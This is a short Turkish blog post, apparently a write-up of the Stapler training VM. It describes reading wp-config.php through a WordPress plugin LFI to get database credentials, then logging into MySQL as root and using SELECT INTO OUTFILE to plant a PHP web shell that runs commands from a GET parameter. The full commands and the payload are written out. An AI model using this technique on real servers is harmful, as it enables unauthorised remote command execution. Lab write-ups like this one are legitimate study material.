Stapler zafiyetli makinasını duymuşsunuzdur. Butarz eğitim makinalarının bir sürü çözüm tekniği bulunmaktadır benim çözümümde MySql üzerinden bir web shell oluşturmuştum ve bunu nasıl yaptığımı size burada anlatmak istiyorum. İlk olarak Web Shell'i yapmayı düşünmemi sağlayan sebepleri açıklayayim.
- Sayfada bir wordpress kuruluyudu ve yaptığım araştırmalarla kullanmış olduğu bir plugin'de LFI zafiyeti vardı. Dizinde olmayan bir dosya belirttiğimde bir php hata mesajı fırlattı ve çalışmakta olduğum dizinin o anki halini bu şekilde tespit ettim. Diyelimki dizin /var/www/html/wordpress/uploads/ olsun...
- LFI sayesinde wp-config.php dosyasını okudum ve bu dosyanın içerisinde var olan
includelar sayesinde doğal olarak Veritabanı bağlantı bilgileride elime ulaşmıştı. - WordPress'in uploads klasörünü dinleyebildiğimi görmüştüm yani bir dosya yüklersem direkt olarak bu klasör altında dosyayı bulabilecektim.
Bunlardan sonra tek yapmam gereken veri tabanına balanıp bir dosya oluşturmak olacaktır. Veri tabanına bağlanma kodlarını aşağıda örnek olması için verdim. Hedef sunucunun IP adresi 10.10.10.10 olsun...
mysql -u root -h 10.10.10.10 wordpress -p
toor
use wordpress;
select '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/wordpress/uploads/webShell.php';Bu işlemi yaptıktan sonra artık web Shell'im kullanmak için hazır...
İlk Yorumu Siz Yapın